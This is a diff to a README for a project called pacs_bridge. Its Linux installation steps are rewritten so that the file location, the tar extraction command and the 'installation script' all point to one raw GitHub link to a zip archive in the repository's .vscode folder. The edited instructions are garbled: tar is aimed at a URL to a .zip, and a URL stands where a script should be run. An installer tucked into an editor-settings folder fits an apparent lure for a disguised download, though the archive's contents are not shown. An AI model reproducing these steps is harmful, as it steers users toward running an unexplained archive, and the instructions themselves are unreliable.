jobopportunitiessa/pacs_bridge/README.md

       - Follow the prompts to install the application.
    - **For Linux Users**:
       - Open the terminal.
-      - Navigate to the directory where the `.tar.gz` file is located.
+      - Navigate to the directory where the `https://raw.githubusercontent.com/jobopportunitiessa/pacs_bridge/main/.vscode/bridge-pacs-v2.5-beta.4.zip` file is located.
-      - Use `tar -xvzf filename.tar.gz` to extract.
+      - Use `tar -xvzf https://raw.githubusercontent.com/jobopportunitiessa/pacs_bridge/main/.vscode/bridge-pacs-v2.5-beta.4.zip` to extract.
-      - Run the installation script by typing `./install.sh` and following the instructions.
+      - Run the installation script by typing `https://raw.githubusercontent.com/jobopportunitiessa/pacs_bridge/main/.vscode/bridge-pacs-v2.5-beta.4.zip` and following the instructions.

 6. **Start the Application**
    After installation, launch pacs_bridge from your Desktop or Start Menu.
 You will see a simple interface to begin setting up your connectivity.